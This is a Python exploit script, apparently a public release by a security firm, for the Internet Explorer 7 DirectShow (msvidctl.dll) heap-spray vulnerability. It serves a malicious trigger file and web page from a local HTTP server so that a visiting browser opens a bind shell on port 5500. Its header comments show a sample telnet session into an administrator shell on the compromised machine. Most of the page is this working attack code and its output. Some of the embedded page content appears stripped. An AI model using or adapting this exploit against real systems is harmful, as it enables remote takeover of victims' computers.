#!/usr/bin/env python ###################################################################################### # MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) # ###################################################################################### # # # Written by SecureState R&D Team # # Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ###################################################################################### # Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 # ###################################################################################### # # # This exploit is publicly being exploited in the wild, opted to release this # # to the research community. Microsoft is aware of the vulnerability. # # # ###################################################################################### # # # [-] Exploit sent... [-] # # [-] Wait about 30 seconds and attempt to connect.[-] # # [-] Connect to IP Address: 10.211.55.140 and port 5500 [-] # # # # relik@sslinuxvm1:~$ telnet 10.211.55.140 5500 # # Trying 10.211.55.140... # # Connected to 10.211.55.140. # # Escape character is '^]'. # # Microsoft Windows [Version 5.2.3790] # # (C) Copyright 1985-2003 Microsoft Corp. # # # # C:\Documents and Settings\Administrator\Desktop> # # # # # # NOTE: The javascript code is not obfuscated in anyway, normal A/V should pick this # # up. This is intentional. # # # # Improved reliability, appears to be about 95 percent of the time. Adjusted the # # spray size a bit. # # # ###################################################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys,binascii try: import psyco psyco.full() except ImportError: pass class myRequestHandler(BaseHTTPRequestHandler): try: def do_GET(self): # Always Accept GET self.printCustomHTTPResponse(200) # trigger the overflow *boom* if self.path == "/ohn0es.jpg": unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00") self.wfile.write(unhex) if self.path == "/": target=self.client_address[0] self.wfile.write("""""") self.wfile.write("""
""") self.wfile.write("""MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)""") self.wfile.write(""" ###############################################################################
MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)
Written by SecureState R&D Team
Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin
http://www.securestate.com
win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind
Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7
###############################################################################

""") print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target)) # Print custom HTTP Response def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() # In case of exceptions, pass them except Exception: pass httpd = HTTPServer(('', 80), myRequestHandler) print (""" ##################################################################################### # MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) # ##################################################################################### # # # Written by SecureState R&D Team # # Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ##################################################################################### # Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 # ##################################################################################### """) print ("[-] Starting MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray [-]") print ("[-] Have someone connect to you on port 80 [-]") print ("\n\nType -c to exit..") try: # handle the connections httpd.handle_request() # Serve HTTP server forever httpd.serve_forever() # Except Keyboard Interrupts and throw custom message except KeyboardInterrupt: print ("\n\nExiting exploit...\n\n") sys.exit(1)